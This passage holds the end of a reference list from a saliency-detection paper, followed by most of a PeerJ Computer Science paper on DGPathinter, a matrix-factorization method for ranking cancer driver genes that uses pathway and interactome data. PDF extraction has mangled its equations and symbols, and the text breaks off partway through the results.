Dong X, Borji A, Yang R. 2019a. Inferring salient objects from human fixations. In: IEEE transactions on pattern analysis and machine intelligence. Piscataway: IEEE. Wang W, Shen J, Shao L. 2017a. Video salient object detection via fully convolutional networks. IEEE Transactions on Image Processing 27:38–49. Wang W, Shen J, Shao L, Porikli F. 2016. Correspondence driven saliency transfer. IEEE Transactions on Image Processing 25:5025–5034 DOI 10.1109/TIP.2016.2601784. Wang W, Shen J, Xie J, Cheng M-M, Ling H, Borji A. 2019b. Revisiting video saliency prediction in the deep learning era. In: IEEE transactions on pattern analysis and machine intelligence. Piscataway: IEEE. Wang W, Shen J, Yang R, Porikli F. 2017b. Saliency-aware video object segmentation. 40:20–33. Yang C, Zhang L, Lu H, Ruan X, Yang M-H. 2013. Saliency detection via graph-based manifold ranking. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 3166–3173. Yao X, Han J, Cheng G, Qian X, Guo L. 2016. Semantic annotation of high-resolution satellite images via weakly supervised learning. IEEE Transactions on Geoscience and Remote Sensing 54:3660–3671 DOI 10.1109/TGRS.2016.2523563. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 20/20 https://peerj.com http://arXiv.org/abs/14091556 http://dx.doi.org/10.1109/TIP.2016.2601784 http://dx.doi.org/10.1109/TGRS.2016.2523563 http://dx.doi.org/10.7717/peerj-cs.280 work_e6jamuapavb4jnm3pcyykhj3ba ---- DGPathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways DGPathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways Jianing Xi1 ,*, Minghui Wang1,2,* and Ao Li1,2 1 School of Information Science and Technology, University of Science and Technology of China, Hefei, China 2 Centers for Biomedical Engineering, University of Science and Technology of China, Hefei, China * These authors contributed equally to this work. ABSTRACT Cataloging mutated driver genes that confer a selective growth advantage for tumor cells from sporadic passenger mutations is a critical problem in cancer genomic research. Previous studies have reported that some driver genes are not highly frequently mutated and cannot be tested as statistically significant, which complicates the identification of driver genes. To address this issue, some existing approaches incorporate prior knowledge from an interactome to detect driver genes which may be dysregulated by interaction network context. However, altered operations of many pathways in cancer progression have been frequently observed, and prior knowledge from pathways is not exploited in the driver gene identification task. In this paper, we introduce a driver gene prioritization method called driver gene identification through pathway and interactome information (DGPathinter), which is based on knowledge-based matrix factorization model with prior knowledge from both interactome and pathways incorporated. When DGPathinter is applied on somatic mutation datasets of three types of cancers and evaluated by known driver genes, the prioritizing performances of DGPathinter are better than the existing interactome driven methods. The top ranked genes detected by DGPathinter are also significantly enriched for known driver genes. Moreover, most of the top ranked scored pathways given by DGPathinter are also cancer progression- associated pathways. These results suggest that DGPathinter is a useful tool to identify potential driver genes. Subjects Bioinformatics, Computational Biology Keywords Matrix factorization, Prior knowledge, Bioinformatics, Data mining INTRODUCTION In the last decade, studies based on advanced DNA sequencing technologies have highlighted the fact that the development and progression of cancer hinges on somatic abnormalities of DNA (Hudson et al., 2010; Vogelstein et al., 2013; Raphael et al., 2014). Despite a small number of driver genes conferring a selective growth advantage for tumor cells, a considerable number of somatic mutations are sporadic passenger mutations that have no impact on cancer process (Sjöblom et al., 2006; Youn & Simon, 2011; How to cite this article Xi et al. (2017), DGPathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways. PeerJ Comput. Sci. 3:e133; DOI 10.7717/peerj-cs.133 Submitted 21 July 2017 Accepted 12 September 2017 Published 9 October 2017 Corresponding author Ao Li, aoli@ustc.edu.cn Academic editor Jaume Bacardit Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.133 Copyright 2017 Xi et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.133 mailto:aoli@�ustc.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.133 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Dees et al., 2012; Lawrence et al., 2013; Hua et al., 2013; Cho et al., 2016). For this reason, distinguishing driver genes from genes with passenger mutations is a critical challenge for understanding genetic basis for cancer. At the same time, somatic mutations of genes in tumor samples can be efficiently detected by next generation sequencing technology (Schuster, 2007; Xiong et al., 2011; Zhao et al., 2013), and enormous accumulated datasets of cancer genomic alterations have been provided by studies such as the cancer genome atlas (TCGA) (Weinstein et al., 2013) and the International Cancer Genome Consortium (ICGC) (Hudson et al., 2010). These large-scale datasets of cancer genomics offer us an unprecedented opportunity to discover driver genes from the somatic mutation profiles of tumor samples (Kandoth et al., 2013; Lawrence et al., 2013, 2014; Tamborero et al., 2013). To address the driver and passenger problem, many efforts have been undertaken to catalogue genes by comparing the mutation frequencies of the tested genes with the background mutation rates (BMRs) through statistical analysis (Dees et al., 2012; Lawrence et al., 2013; Hua et al., 2013; Sjöblom et al., 2006; Youn & Simon, 2011). For example, a previous study has been adopted to identify genes with mutational significance by using a per-gene BMR (Dees et al., 2012), and another research study on driver genes is based on utilizing information of coverage and other genomic features such as DNA replication time to estimate the BMRs of genes (Lawrence et al., 2013). Furthermore, Bayesian approaches are also applied to estimate BMRs in detecting driver genes (Hua et al., 2013). In addition, some other studies are proposed to determine driver genes through the cancer mutation prevalence scores of genes in tumor samples (Sjöblom et al., 2006) or the predicted impact on protein function and the mutational recurrence of genes (Youn & Simon, 2011). Through these mutation frequency-based approaches, a number of statistically significantly potential driver genes have been identified (Dees et al., 2012; Lawrence et al., 2013; An et al., 2014). Nevertheless, although some driver genes are mutated at high frequencies among tumor samples, previous studies have reported that some driver genes are mutated at low frequencies, and the mutation frequencies of these genes are too low to be tested as statistically significant (Vandin, Upfal & Raphael, 2011; Leiserson et al., 2014; Raphael et al., 2014). A prevalent assumption to explain the long tail phenomenon is that genes usually interact with other genes, and some genes with no mutation can be perturbed by their interacting neighbors (Vandin, Upfal & Raphael, 2011; Leiserson et al., 2014; Raphael et al., 2014; Cho et al., 2016). Based on this assumption, many studies for driver gene identification have been proposed by incorporating interactome information as prior knowledge (Vandin, Upfal & Raphael, 2011; Leiserson et al., 2014; Raphael et al., 2014; Hofree et al., 2013; Bashashati et al., 2012; Cho et al., 2016). The interactome information is employed as gene interaction network obtained from databases including iRefIndex (Razick, Magklaras & Donaldson, 2008), STRING (Szklarczyk et al., 2011) and others (Prasad et al., 2009; Lee et al., 2011; Das & Yu, 2012; Khurana et al., 2013). For example, HotNet and HotNet2 use the idea of heat-diffusion and propagate the mutation frequency scores of genes through the network, and calculate the significance scores of genes to identify potential driver genes (Vandin, Upfal & Raphael, 2011; Leiserson et al., 2014). NBS is an integrated method that propagates the mutations through the Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 2/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ interaction network for each tumor sample as preprocessing, and uses matrix factorization to obtain mutation-based subtypes and the mutation profiles of each subtypes (Hofree et al., 2013), where the mutation profiles can be utilized to prioritize driver genes (Hofree et al., 2013; Shi, Gao & Wang, 2016). Instead of using network propagation, MUFFINN prioritizes the genes by the mutational impact of their direct neighbors in the network context (Cho et al., 2016). In addition, interaction network information has also been used to predict patient specific driver genes, which helps the personalized analysis (Hou & Ma, 2014; Jia & Zhao, 2014; Bertrand et al., 2015). Through the network-based approaches, many novel potential driver genes have been discovered, which greatly complements the understanding of cancer driver genes (Leiserson et al., 2014; Raphael et al., 2014; Cho et al., 2016). However, knowledge from pathways is not exploited in the aforementioned driver gene identification approaches. Since the operation of many pathways has been frequently reported to be altered in cancer progression (Parsons et al., 2008; Cancer Genome Atlas Research Network, 2008; Vaske et al., 2010), the knowledge from pathways is also important for understanding the roles of genes in cancer and thus can conduct the identification of cancer driver genes. Notably, some studies have cataloged pathway knowledge into publicly available databases, such as KEGG (Ogata et al., 1999), reactome (Joshi-Tope et al., 2005) and BioCarta (Nishimura, 2001), which have also been used to detect the perturbed pathways involved in the tested tumor samples in some previous efforts (Subramanian et al., 2005; Ng et al., 2012; Li et al., 2016; Ma et al., 2016). Although the pathway information is used in these approaches, they are not designed to identify potential driver genes. Meanwhile, the aforementioned driver gene detecting methods only use interactome information and not the pathway information. Consequently, the already available knowledge from pathways remains an underexploited resource in the identification of potential driver genes, and there is a lack of an approach that can effectively integrate information from both interactome information and pathways as prior knowledge. In this article, we introduce driver gene identification through pathway and interactome information (DGPathinter), to discover potential driver genes from mutation data through a knowledge-based matrix factorization framework, where prior knowledge from pathways and interaction network is efficiently integrated. By maximizing the correlation between the relations of mutation scores of genes and the pathway scores (Chen & Zhang, 2016), we can identify potential driver genes driven by prior knowledge from pathways. At the same time, we also use a graph Laplacian technique to adopt information from an interaction network in the identification of driver genes (Xie, Wang & Tao, 2011). In addition, we use the framework of matrix factorization to integrate the information of mutation profiles, interactome and pathways, which is capable of factorizing the gene mutation scores from different sets of tumor samples and helps DGPathinter to address tumor sample heterogeneity issue (Lee et al., 2010; Sill et al., 2011; Zhou et al., 2014; Xi & Li, 2016). Compared with our previous approach (Xi, Li & Wang, 2017), DGPathinter is a revised computational model with additional prior information incorporated. Although both DGPathinter and the previous approach Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 3/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ (Xi, Li & Wang, 2017) utilize matrix factorization framework and network information, DGPathinter further considers the prior information of the pathway. In addition to driver gene identification, DGPathinter can provide highly scored pathways for the investigated tumor samples, while our previous approach could not. When we apply DGPathinter and three existing interactome driven methods on three TCGA cancer datasets, the detection results of DGPathinter outperform those of the competing methods. The top ranked genes detected by DGPathinter are also highly enriched for known driver genes. We further investigate the top ranked scored pathways yielded by DGPathinter, demonstrating that most of these pathways are also associated with cancer progressions. The remainder of the paper is organized as follow: “Materials and Methods” introduces the rationales and detailed techniques of our method DGPathinter. In “Results”, we apply our method on three cancer datasets and evaluate DGPathinter with the three existing methods through known driver genes. Finally, we discuss our future work and make a brief conclusion in “Discussion”. The code of DGPathinter can be freely accessed at https://github.com/ USTC-HIlab/DGPathinter. MATERIALS AND METHODS Somatic mutation datasets For the somatic mutation data of cancers, we focus on three types of cancers from TCGA datasets, which include 507 tumors samples from breast invasive carcinoma (BRCA) (Cancer Genome Atlas Network, 2012), 83 tumor samples from glioblastoma multiforme (GBM) (Cancer Genome Atlas Research Network, 2008) and 401 tumor samples from thyroid carcinoma (THCA) (Cancer Genome Atlas Research Network, 2014). The somatic mutation data are downloaded from cBioPortal database (Gao et al., 2013). The somatic mutation data are formed as a binary matrix (sample � gene) Xn�p (Bashashati et al., 2012; Hofree et al., 2013; Kim, Sael & Yu, 2015), where n is the number of samples and p is the number of the tested genes. An entry of the matrix being 1 denotes a mutation occurs in the respective gene and tumor sample, when compared with the germline (Bashashati et al., 2012; Hofree et al., 2013; Kim, Sael & Yu, 2015). The network information used in this study is iRefIndex (Razick, Magklaras & Donaldson, 2008), a highly curated interaction network containing 12,129 nodes (genes) and 91,809 edges (interactions). For the pathway information, we follow previous studies (Park et al., 2015) and use the curated pathways from three databases, KEGG (Ogata et al., 1999), reactome (Joshi-Tope et al., 2005) and BioCarta (Nishimura, 2001), which are also downloaded from the previous study (Park et al., 2015). Model of knowledge-driven matrix factorization To efficiently identify potential driver genes from somatic mutation data, we use a knowledge-driven matrix factorization framework, which can successfully integrated information from pathways and interaction networks. A brief overview of DGFathinter is illustrated in Fig. 1. Since many matrix factorization-based methods have been used for detecting abnormal genes from heterogeneous tumor samples (Lee et al., 2010; Sill et al., 2011; Zhou et al., 2013, 2014; Xi & Li, 2016; Xi, Li & Wang, 2017), we introduce matrix Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 4/25 https://github.com/USTC-HIlab/DGPathinter https://github.com/USTC-HIlab/DGPathinter http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ S am pl e: n Gene: p Mutation matrix: X Sample matrix: S Gene matrix: G n x p n x k k x p T Maximum mutation score for each genes Prior information from pathway Tr{G F V } p x m T m x k k x p Prior information from interactome Tr{G L G } p x p T p x k k x p Relationship matrix: F (genes to pathways) Pathway score matrix: V p x m m x k Laplacian matrix of network: L p x p TP53 PTEN IDH1 PIK3CA CDH1 AKT1 MAP3K1 BRAF KRAS Figure 1 A schematic diagram providing an overview of DGPathinter. In DGPathinter, we utilize prior knowledge from pathways and interactome information in our model. The two types of prior knowledge are integrated via a knowledge-driven matrix factorization framework. This matrix factor- ization framework also decompose the somatic mutation matrix as the multiplication of two low rank matrices Sn�k = (s1, : : : , sk) and G T k�p = (g1, : : : , gk) T , which is equivalent to the summation of k rank- one layers Pk i¼1 ðsigTi Þ. The matrix S is a binary matrix, of which the entries represent to the assignments of the samples to the rank-one layers. The entries of the matrix GT denote the gene mutation scores for the samples in the rank-one layers. To integrate the pathway information into the analysis workflow, we project the gene scores in the matrix G onto their related pathways and maximize the covariance between the projection scores and pathway scores -Tr{GTFV}, where the bipartite matrix Fp�m represents the relationships of the genes and the pathways, and the entries of the non-negative pathway score matrix Vm�k represent the scores of the respective pathways and rank-one layers. Meanwhile, to incorporate interactome information from an interaction network, we introduce a graph Laplacian regularization term Tr{GTLG} on the matrix G, where the matrix Lp�p is the Laplacian matrix of the interaction network. For each gene, we choose the maximal gene mutation scores among the k rank-one layers from the matrix G and prioritize the driver genes. The top ranked genes are regarded as potential driver genes for further evaluations. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 5/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ factorization framework into DGPathinter. The matrix factorization-based methods factorize the data matrix as the multiplication of a low-rank sample matrix and a low-rank gene matrix (Lee et al., 2010; Sill et al., 2011; Zhou et al., 2013, 2014; Xi & Li, 2016; Xi, Li & Wang, 2017), where the entries of the sample matrix indicate the assignments of different samples to different subsets and the entries of the gene matrix indicate the scores of the abnormal genes in the related subsets of samples. In our previous study (Xi, Li & Wang, 2017), the matrix factorization framework has been shown to be an appropriate framework for the task of detecting driver genes from mutation data of heterogeneous cancers. Here we denote the matrix Gk�p = (g1, : : : , gk) as the gene matrix and the binary matrix Sn�k = (s1, : : : , sk) as the sample matrix, and use their multiplication SG T to approximate the mutation matrix X. The entries of G represent the mutation scores of the tested genes related to the set of tumor samples indicated by the sample matrix S, which represent the assignments of the tested sample in different sample sets. Here the number k is the rank of reconstruction matrix of the mutation matrix X. Due to the constraint that the entries of matrix S are binary value, we use Boolean constraint on matrix S (Malioutov & Malyutov, 2012), i.e., S ∘ (S - J) = 0, where the operator ∘ indicates Hadamard product of two matrix, and the matrix J denotes an n�k matrix with all the entries being 1. The fitting problem of the multiplication of the two matrices S and G and the mutation matrix X can be formulate as X ≃ SGT + ε, where the ε is the residual matrix between the matrix X and the multiplication SGT, and matrix S is subject to the equality restriction S ∘ (S - J) = 0. By estimating the mutation scores of the tested genes in the matrix G from information of somatic mutation data, pathways and interaction network, we can identify the potential driver genes by ranking their mutation scores. The strategies of incorporating pathway and network information are present below. To make the driver gene prioritization procedure in our model driven by prior knowledge from pathways, we introduce a non-negative matrix Vm�k as the pathway score matrix. The row number of the matrix m is total number of pathways used in our model. The column vectors in the matrix V = (v1, : : : , vk) represent the scores of the pathways, and a higher score of a pathway indicates a larger potential that the pathway is dysregulated in the related set of tumor samples. To incorporate pathway information into gene scores for different sets of samples, we project the gene scores onto their related pathways and maximize the covariance between the projection scores and pathway scores as RC ¼� Pk j¼1 CovðFgj; vjÞ¼�Tr GTFTV � � (Chen & Zhang, 2016), where the matrix V is subject to the inequality restriction V � 0. Here the matrix Fm�p represents the relationships of the tested genes and their related pathways. The entry Fij equaling 1 denotes that the jth gene belongs to the ith pathway. In addition, to avoid an overfitting problem, we also use Frobenius norm-based regularization on the pathway scores V as RV ¼ Vk k2F (Pan et al., 2008). Furthermore, to integrate interaction network information into our model, we utilize Laplacian regularization to encourage the smoothness between the scores of the interacted genes (Xie, Wang & Tao, 2011). The regularization term is formulated as RL = Tr{G TLG}, where the matrix L = D - A is the Laplacian matrix of Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 6/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ interaction network, the matrix A is the adjacency matrix, and the matrix D is its corresponding degree matrix. Consequently, we estimate the mutation scores of the tested genes in gene matrix G, pathway score matrix V and sample indicator matrix S by optimizing an optimization function of a knowledge-driven model with integrated data fitting and regularization terms formulated as: min S;G;V 1 2 X �SGT �� 2 F ��CTrfGTFTVgþ 1 2 �LTrfGTLGgþ 1 2 �V Vk k2F s:t:S�ðS� JÞ¼ 0; V � 0 (1) where �C, �L and �V are used to balance the data fitting, the coherence gene scores and pathway scores according to their relations, the smoothness between scores of interacted genes and the regularization term of pathway scores. The tuning parameters �C, �V and �L are empirically set to 0.01, 0.01 and 0.1, respectively. We have also investigated the results of DGPathinter when the three parameters changes. For the three parameters, we can see that the detection results of the top 100 genes show little variance when the tuning parameters are changed (Figs. S1–S3), demonstrating the robustness of our model with respect to these parameters. In Fig. 1, we illustrate an overview of DGPathinter through schematic diagram. Optimization of knowledge-driven matrix factorization Due to the equivalence between the matrix multiplication SGT and the summation of multiple rank-one layers Pk i¼1 sig T i , we incorporate a layer-by-layer procedure to solve the optimization problem iteratively (Lee et al., 2010; Sill et al., 2011; Xi & Li, 2016). Note that the first layer is the best rank-one estimation of the data matrix. We estimate the first layer by minimizing the following objective function min s1;g1;v1 1 2 X � s1gT1 �� 2 F ��CTrfgT1 FTv1gþ 1 2 �LTrfgT1 Lg1gþ 1 2 �V v1k k2F s:t:s1 �ðs1 �1nÞ¼ 0; v1 � 0; (2) where s1, g1 and v1 are the first column vectors of matrices S, G and V respectively, and 1n�1 indicate a vector with all coefficients being 1. The v T 1 v1 is the inner product of vector v1, which is equivalent to squared Frobenius norm of the vector. We then apply an alternatively strategy to estimate the three vectors s1, g1 and v1 in Eq. (2). When the other two vectors v1 and s1 are fixed, the minimization problem for the mutation score vector g1 can be reformulated as below: ming1 1 2 s1k k22gT1 g1 �ðXTs1Þg1 ��CðFTv1ÞTg1 þ 1 2 �Lg T 1 Lg1: (3) Through Karush–Kuhn–Tucker (KKT) conditions, the mutation score vector g1 can be estimated as Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 7/25 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ g1 s1k k22Ip þ�LL � ��1 XTs1 þ�CFTv1 � � ; (4) where Ip is a p�p identity matrix. Likewise, the optimization function to solve the pathway score vector v1 in optimization problem in Eq. (2) is formulated as min v1 1 2 �V v T 1 v1 ��CðFg1ÞTv1 s:t:v1 � 0; (5) which is a non-negative quadratic programming problem. The estimation of the vector v1 in Eq. (5) can be calculated as: v1 fð�C=�VÞFg1gþ; (6) where {·}+ is an operator which replace the negative coefficients of the input vector with zeros. For sample indicator vector s1, the optimization function of Eq. (2) is formulated as a Boolean constraint problem min g1 1 2 g1 �� 2 2 sT1 s1 �ðXg1Þs1 s:t:s1 �ðs1 �1nÞ¼ 0: (7) Through KKT conditions, the problem in Eq. (7) can be solved as: s1 I½0;þ1Þ � Xg1 � 12 g1 �� 2 2 � (8) where I� (z) is indicator function, of which the coefficients of the output vector are assigned to 1 when the corresponding coefficients of input vector z belongs to the set �, and 0 otherwise. Consequently, the minimizing function is optimized by alternatively estimating the three vectors g1, v1 and s1 in Eqs. (4), (6) and (8) until convergence (Pseudo-code in Table 1). After convergence, the first rank-one layer s1g T 1 from the mutation matrix X, along with the related pathway score vector v1, are obtained. Since the cancer data may display heterogeneity, it is not sufficient to utilize only one layer to fit the mutation data matrix. Subsequently, we apply the one layer estimation strategy aforementioned on the remaining samples to obtain the next layer. When the mutation matrix is factorized iteratively until no sample remains, we can obtain the rank number k automatically (Lee et al., 2010; Sill et al., 2011; Xi & Li, 2016). The multiple layers estimation yielded by our model can effectively incorporate information from the mutation matrix, the interaction network and pathways. Experimental design and evaluation For the driver gene prioritization of our approach, we select the maximum entries of each row of gene matrix G as the score of the tested genes to be potential driver genes, which represent the intensities of the mutation of tested genes among different sets of Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 8/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ tumor samples. We then prioritize the investigated genes according to their mutation scores and select the top ranked genes as potential driver genes. Due to the lack of gold standard for driver genes that are generally accepted, we further evaluate the detected genes via a list of known benchmarking cancer genes from a highly curated database, the Network of Cancer Genes (NCG4.0) (An et al., 2014). The NCG4.0 gene list contains both experimentally supported cancer genes from the Cancer Gene Census (CGC) (Futreal et al., 2004) and statistical inferred candidate genes from previous studies (An et al., 2014). The cancer specific genes from the two benchmarking gene lists are used to assess the prioritizing results of the investigated methods. By using these benchmarking genes as ground truth genes in the evaluation studies, we firstly compute the precisions and recalls under different rank thresholds and draw precision–recall curves of the competing methods, where a curve closer to the top and right indicates a better performance (Wu, Hajirasouliha & Raphael, 2014; Yang et al., 2017). The precision is calculated as the fraction of selected genes that are also benchmarking genes, and the recall is computed as the fraction of benchmarking genes that are selected by the rank threshold. Next, we calculate the average rank of known genes in the prioritization results to comprehensively assess the prioritization performance, which is a traditional metric for evaluating the performance of retrieval (Ma & Zhang, 1998; Gargi & Kasturi, 1999; Müller et al., 2001). Furthermore, we select the top 100 genes from the results of the competing methods, and compare the proportions of known driver genes detected by the competing methods. Fisher’s exact test is also applied on the results, which can evaluate whether the selected genes are significantly enriched for known driver genes by p values of the test. In addition, for the highly scored pathways given by our Table 1 Pseudo-code of the first rank-one layer estimation of DGPathinter. Algorithm 1 DGPathinter: iterative estimation of the first rank-one layer Input: soamtic mutation matrix Xn�p; pathway by gene bipartite matrix Fm�p; graph Laplacian matrix of interaction network Lp�p. Output: sample indicator vector s1 (n�1); gene score vector g1 (p�1); pathway score vector v1 (m�1). 1: set �C 0:01; �V 0:01; �L 0:1 and t 0 2: s ð0Þ 1 1n�1, v ð0Þ 1 0m�1 and g ð0Þ 1 nIp þ�LL � ��1 XTs ð0Þ 1 þ �CFTv ð0Þ 1 � � 3: repeat 4: v ðtþ1Þ 1 fð�C=�VÞFg ðtÞ 1 gþ 5: g ðtþ1Þ 1 s ðtÞ 1 �� 2 2 Ip þ�LL �1 XTs ðtÞ 1 þ�CFTv ðtþ1Þ 1 � � 6: s ðtþ1Þ 1 I½0;þ1Þ Xg ðtþ1Þ 1 � 12 g ðtþ1Þ 1 �� 2 2 7: t t þ1 8: until Convergence 9: return v1 vð1Þ1 , g1 g ð1Þ 1 and s1 s ð1Þ 1 Notes: 1n�1 is an n�1 vector with all coefficients being 1; 0m�1 is an m�1 vector with all coefficients being 0. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 9/25 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ approach, we also investigate whether these pathways are correlated with cancer progressions. RESULTS Driver gene identification To evaluate the identification performance of DGPathinter, we compare our model with three existing methods, HotNet2 (Leiserson et al., 2014), NBS (Hofree et al., 2013) and MUFFINN (Cho et al., 2016), on datasets of three types of cancers: BRCA, GBM and THCA. In the performance evaluation, HotNet2, NBS and MUFFINN are set to their default parameters. For MUFFINN, there are two versions (MUFFINN-DNmax and MUFFINN-DNsum) based on different strategies (Cho et al., 2016), and we use both versions in the comparison study. The interactome information of all the investigated methods is the iRefIndex gene interaction network from Razick, Magklaras & Donaldson (2008). The pathway information used in DGPathinter is from KEGG, Reactome and BioCarta (Ogata et al., 1999; Joshi-Tope et al., 2005; Nishimura, 2001). In DGPathinter, the genes are ranked by their mutation scores from the matrix G. In the identification result of HotNet2, a higher delta score of a gene indicates a larger potential of being driver genes (details in Supplemental Information). For NBS, the genes are sorted according to their scores in the NBS profiles. In MUFFINN, the prediction scores of genes for MUFFINN-DNmax and MUFFINN-DNsum are used to prioritize the genes. To give a comprehensive view of the identification performance, we analyze all the investigated genes by precision–recall curves and average ranks of known driver genes over the prioritization results. For the top ranked genes, we further compare the fractions of known benchmarking genes among the results of these methods, and their related p values of Fisher’s exact test. Venn diagrams of the top ranked genes among the competing methods are also analyzed. Performance comparison The overall performance of DGPathinter, HotNet2, NBS, MUFFINN-DNmax and MUFFINN-DNsum are illustrated as precision–recall curves in Fig. 2. When we use the known benchmarking cancer genes in NCG4.0 as a gold-standard, the precision–recall curves of DGPathinter are located over the other curves clearly for all the three types of cancers, indicating that DGPathinter yields the best identification performance among the four results on the datasets of the three types of cancers. Taking BRCA result as an example, the precisions of DGPathinter, HotNet2, NBS, MUFFINN-DNmax and MUFFINN-DNsum are 37.7%, 4.1%, 16.4%, 4.4% and 4.3% respectively when the recalls of the results are fixed at 5.0%. In the GBM results, the precisions of GBM-specific NCG4.0 genes are 37.6% for HotNet2, 45.8% for NBS, 0.8% for MUFFINN-DNmax and 3.6% for MUFFINN-DNsum when the recalls are 5.0%. In comparison, DGPathinter achieves a precision of 100.0% in the same situation. For the known experimental validated driver genes curated by CGC, we also draw the precision–recall curves of the four investigated results for the CGC gene list. In consistency with the NCG4.0 results, Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 10/25 http://dx.doi.org/10.7717/peerj-cs.133#supplemental-information http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ a similar phenomenon can also be observed that the identification performance of our approach outperforms the results of the other competing methods (Fig. S4). For example, DGPathinter gives a precision of 77.5% on the BRCA data and 100.0% on the GBM data when recalls are at 10.0%, which are also higher than those of the other competing methods in the same situation. To assess whether and to which extent the difference between the performance of our method and previous approaches is statistically significant, we apply the non-parametric Friedman test on the areas under the curve (AUCs) of precision–recall curves among the three investigated cancers (Table S1). The AUCs for known NCG4.0 and CGC genes yields p values of 0.03 and 0.02, respectively, indicating that the difference between the performance of the investigated methods is statistically significant. We also evaluate average rank of the known cancer genes predicted by the investigated methods. For the NCG4.0 gene list, DGPathinter yields average rank of 67.5 for known breast cancer specific genes, which is smaller than the those of 829.7 for HotNet2, 91.8 for NBS, 1731.4 for MUFFINN-DNmax, 1271.9 for MUFFINN-DNsum (Table 2) and 6064.5 for random selection. This result demonstrates that the benchmarking cancer genes in the result of our approaches are ranked much closer to the top in average, when compared Recall 0 0.2 0.4 0.6 0.8 1 P re ci si on 0 0.2 0.4 0.6 0.8 1 BRCA DGPathinter HotNet2 NBS MUFFINN-DNmax MUFFINN-DNsum Recall 0 0.2 0.4 0.6 0.8 1 P re ci si on 0 0.2 0.4 0.6 0.8 1 GBM DGPathinter HotNet2 NBS MUFFINN-DNmax MUFFINN-DNsum Recall 0 0.2 0.4 0.6 0.8 1 P re ci si on 0 0.2 0.4 0.6 0.8 1 THCA DGPathinter HotNet2 NBS MUFFINN-DNmax MUFFINN-DNsum a b c Figure 2 Precision–recall curves of the prioritization results of the investigated methods for cancer specific known driver genes curated by NCG4.0 (An et al., 2014) on (a) BRCA, (b) GBM and (c) HNSC datasets, where blue, dark green, light green, dark red and violet lines represent the curves of DGPathinter, HotNet2, NBS, MUFFINN-DNmax and MUFFINN-DNsum, respectively. Different points on a same curve represent the precisions and recalls at different thresholds of the results. Table 2 The average ranks of cancer specific known driver genes that are prioritized by the competing methods on BRCA, GBM and THCA dataset. Known driver genes list NCG4.0 CGC Method BRCA GBM THCA BRCA GBM THCA DGPathinter 67.5 28.1 15.1 12.2 7.7 15 HotNet2 829.7 84.4 244.3 909.2 23.6 349.3 NBS 91.8 34.1 25.2 18 8.9 21.4 MUFFINN-DNmax 1731.4 1097.6 4940.1 1522.8 252.9 1663.2 MUFFINN-DNsum 1271.9 920.6 5666.6 1918.6 103.2 3642.5 Random 6064.5 6064.5 6064.5 6064.5 6064.5 6064.5 Note: The evaluation cancer specific known driver genes are from NCG4.0 (An et al., 2014) (left part of table) and CGC (Futreal et al., 2004) (right part of table). Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 11/25 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133/supp-1 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ with those of other three results. When we examine the CGC experimentally validated genes, our approach also yields the smallest average rank among the competing methods (Table 2). The average ranks for breast cancer specific CGC gene list are 67.5, 829.7, 91.8, 1731.4, 1271.9 and 6064.5 for DGPathinter, HotNet2, NBS, MUFFINN-DNmax, MUFFINN-DNsum and random selection, respectively. We also apply the non- parametric Friedman test on the average ranks of known NCG4.0 and CGC genes in the detection results of the competing methods, yielding p values of 0.02 and 0.02 respectively. The aforementioned investigations suggest that DGPathinter shows a promising capability for prioritizing known cancer genes than those of the other competing approaches. Evaluation of top ranked genes For the top ranked genes, the top 100 genes of the five prioritization results are selected for further evaluation. In BRCA result, the top 100 genes for HotNet2, NBS, MUFFINN- DNmax and MUFFINN-DNsum include 3, 15, 5 and 4 genes in NCG4.0 list respectively. In contrast to the top 100 genes for DGPathinter, there are 30 genes matched in the NCG4.0 benchmarking genes (Fig. 3). The p value of Fisher’s exact tests on the result of the DGPathinter on BRCA is 1.13–24, indicating that the selected NCG4.0 genes are significantly enriched for NCG4.0 genes. For the GBM results, DGPathinter, HotNet2, NBS, MUFFINN-DNmax and MUFFINN-DNsum identify 13, 12, 8, 1 and 1 NCG4.0 genes, with related p values of 3.63e-14, 1.01e-12, 1.91e-07, 4.68e-01 and 4.68e-01 respectively. Compared with the p values of the other identification results, DGPathinter yields the smallest p values among the competing results (Fig. 3). These results demonstrate that DGPathinter performs the best among these methods in detecting 